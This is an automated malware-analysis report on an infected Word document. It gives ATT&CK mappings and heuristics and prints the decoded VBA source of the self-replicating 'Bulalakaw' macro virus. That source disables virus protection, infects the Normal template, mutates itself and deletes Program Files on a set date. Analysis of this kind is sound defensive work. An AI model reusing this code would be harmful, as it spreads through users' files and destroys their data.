Verdict: MALICIOUS (Risk Score: 280)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This Office document contains VBA macros, including AutoOpen and AutoClose, which are designed to execute automatically. The critical heuristic 'OLE_VBA_SHELL' indicates a direct call to the Shell() function, suggesting the macro attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Noswan-1' further confirms its malicious nature. The VBA code also includes obfuscation techniques like 'PolyEngine' and string concatenation, typical of malware aiming to evade detection.
Heuristics (7)
- ClamAV: Doc.Trojan.Noswan-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Noswan-1
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Auto_Close macro [high] OLE_VBA_AUTOCLOSE: Auto_Close macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15382 bytes |

SHA-256: b2edb6ba23377aaed1726ab83ee4d0092f830eb415017200ae6aecbb21080c62

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Bulalakaw"
Public Skip As Integer
Sub PolyEngine()
On Error Resume Next
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule
Rem NsRxExGjAmDuRkRkMsEhGjJfQjUpMsJnQpRt
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
Rem IlAzPfSeBoKuAjNsDzCrPmRpLvHfVqRsQlUeBzUkTfNjRqMgOwOyBrSeFqDeHz
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("Bulalakaw").CodeModule
PolySize = Int(Rnd * 10)
For Polymorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Rem IpMeLgIiPmMqNiMyUsHoNkLrBoAoVkPhEf
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next Polymorphic
End With
End If
End Sub
Sub Bulalakaw()
'+++++++++++++++++++++++++++++++++++++++++++++++++
'Virus Name: Bulalakaw
'Author: Lucky Warrior
'Copyright © 1999 Bgy. Tiguib, Oras, Eastern Samar
'All rights reserved.
'+++++++++++++++++++++++++++++++++++++++++++++++++
On Error Resume Next
Options.ConfirmConversions = False
Rem AqHlPiIqQiDsRkLwRkQhDmKkFtNfVvRxOqIpEr
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("Bulalakaw").Export "c:\Bulalakaw.drv"
ActiveDocument.ReadOnlyRecommended = False
If Day(Now()) = 25 Then
Shell ("Deltree /y C:\Progra~1")
End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Lucky Warrior"
.Comments = "Bulalakaw"
.Execute
Rem MoFuCkGhTvOtSkQhEhPhOsTo
End With
Rem VlSpTi
If NormalTemplate.VBProject.VBComponents.Item("Bulalakaw").Name <> "Bulalakaw" Then SuchBulalakaw = True
If ActiveDocument.VBProject.VBComponents.Item("Bulalakaw").Name <> "Bulalakaw" Then MoreBulalakaw = True
Rem Uk
If SuchBulalakaw = True And MoreBulalakaw = False Then Set PhUz39490774 = NormalTemplate.VBProject.VBComponents
If SuchBulalakaw = False And MoreBulalakaw = True Then Set PhUz39490774 = ActiveDocument.VBProject.VBComponents
PhUz39490774.import "c:\Bulalakaw.drv"
If SuchBulalakaw = False And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If MoreBulalakaw = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
Breakpoint:
End Sub
Sub FileNew()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
Dialogs(wdDialogFileNew).Show
Skip = 1
Call Bulalakaw
End Sub
Rem Ry
Sub FileSave()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call Bulalakaw
Call PolyEngine
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Rem QmVuOrIwVmLmGyGeDnPrFjAyKqDqMeFeRxPmCmDqEhBtFeByKiFgHmUjNoDtCjNz
Call Bulalakaw
Call PolyEngine
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Bulalakaw
Call PolyEngine
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call Bulalakaw
End Sub
Sub FileExit()
On Error Resume Next
Call Bulalakaw
Call PolyEngine
If ActiveDocument.Saved =
... (truncated)